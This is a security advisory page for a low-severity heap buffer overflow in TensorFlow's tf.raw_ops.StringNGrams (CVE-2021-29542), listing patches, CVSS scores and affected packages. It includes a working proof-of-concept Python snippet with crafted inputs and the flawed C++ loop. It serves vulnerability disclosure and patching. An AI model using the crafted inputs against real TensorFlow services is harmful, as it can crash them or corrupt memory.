GHSA-4hrh-9vmp-2jgg
Suggest an improvement- Source
- https://github.com/advisories/GHSA-4hrh-9vmp-2jgg
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-4hrh-9vmp-2jgg/GHSA-4hrh-9vmp-2jgg.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-4hrh-9vmp-2jgg
- Aliases
- Related
- Published
- 2021-05-21T14:23:15Z
- Modified
- 2024-10-31T20:00:54.686044Z
- Severity
-
- 2.5 (Low) CVSS_V3 - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L CVSS Calculator
- 2.0 (Low) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- Heap buffer overflow in `StringNGrams`
- Details
-
Impact
An attacker can cause a heap buffer overflow by passing crafted inputs to
tf.raw_ops.StringNGrams:import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3] data_splits = tf.constant(l2, shape=[116], dtype=tf.int64) out = tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=separator, ngram_widths=ngram_widths, left_pad=left_pad, right_pad=right_pad, pad_width=pad_width, preserve_short_sequences=preserve_short_sequences)This is because the implementation fails to consider corner cases where input would be split in such a way that the generated tokens should only contain padding elements:
for (int ngram_index = 0; ngram_index < num_ngrams; ++ngram_index) { int pad_width = get_pad_width(ngram_width); int left_padding = std::max(0, pad_width - ngram_index); int right_padding = std::max(0, pad_width - (num_ngrams - (ngram_index + 1))); int num_tokens = ngram_width - (left_padding + right_padding); int data_start_index = left_padding > 0 ? 0 : ngram_index - pad_width; ... tstring* ngram = &output[ngram_index]; ngram->reserve(ngram_size); for (int n = 0; n < left_padding; ++n) { ngram->append(left_pad_); ngram->append(separator_); } for (int n = 0; n < num_tokens - 1; ++n) { ngram->append(data[data_start_index + n]); ngram->append(separator_); } ngram->append(data[data_start_index + num_tokens - 1]); // <<< for (int n = 0; n < right_padding; ++n) { ngram->append(separator_); ngram->append(right_pad_); } ... }If input is such that
num_tokensis 0, then, fordata_start_index=0(when left padding is present), the marked line would result in readingdata[-1].Patches
We have patched the issue in GitHub commit ba424dd8f16f7110eea526a8086f1a155f14f22b.
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.
- Database specific
{ "nvd_published_at": "2021-05-14T20:15:00Z", "cwe_ids": [ "CWE-131", "CWE-787" ], "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2021-05-18T21:54:20Z" }- References
-
- https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4hrh-9vmp-2jgg
- https://nvd.nist.gov/vuln/detail/CVE-2021-29542
- https://github.com/tensorflow/tensorflow/commit/ba424dd8f16f7110eea526a8086f1a155f14f22b
- https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-470.yaml
- https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-668.yaml
- https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-179.yaml
- https://github.com/tensorflow/tensorflow
Affected packages
PyPI / tensorflow
Package
- Name
- tensorflow
- View open source insights on deps.dev
- Purl
- pkg:pypi/tensorflow
PyPI / tensorflow
Package
- Name
- tensorflow
- View open source insights on deps.dev
- Purl
- pkg:pypi/tensorflow
PyPI / tensorflow
Package
- Name
- tensorflow
- View open source insights on deps.dev
- Purl
- pkg:pypi/tensorflow
PyPI / tensorflow
Package
- Name
- tensorflow
- View open source insights on deps.dev
- Purl
- pkg:pypi/tensorflow
PyPI / tensorflow-cpu
Package
- Name
- tensorflow-cpu
- View open source insights on deps.dev
- Purl
- pkg:pypi/tensorflow-cpu
PyPI / tensorflow-cpu
Package
- Name
- tensorflow-cpu
- View open source insights on deps.dev
- Purl
- pkg:pypi/tensorflow-cpu
PyPI / tensorflow-cpu
Package
- Name
- tensorflow-cpu
- View open source insights on deps.dev
- Purl
- pkg:pypi/tensorflow-cpu
PyPI / tensorflow-cpu
Package
- Name
- tensorflow-cpu
- View open source insights on deps.dev
- Purl
- pkg:pypi/tensorflow-cpu
PyPI / tensorflow-gpu
Package
- Name
- tensorflow-gpu
- View open source insights on deps.dev
- Purl
- pkg:pypi/tensorflow-gpu
PyPI / tensorflow-gpu
Package
- Name
- tensorflow-gpu
- View open source insights on deps.dev
- Purl
- pkg:pypi/tensorflow-gpu
PyPI / tensorflow-gpu
Package
- Name
- tensorflow-gpu
- View open source insights on deps.dev
- Purl
- pkg:pypi/tensorflow-gpu
PyPI / tensorflow-gpu
Package
- Name
- tensorflow-gpu
- View open source insights on deps.dev
- Purl
- pkg:pypi/tensorflow-gpu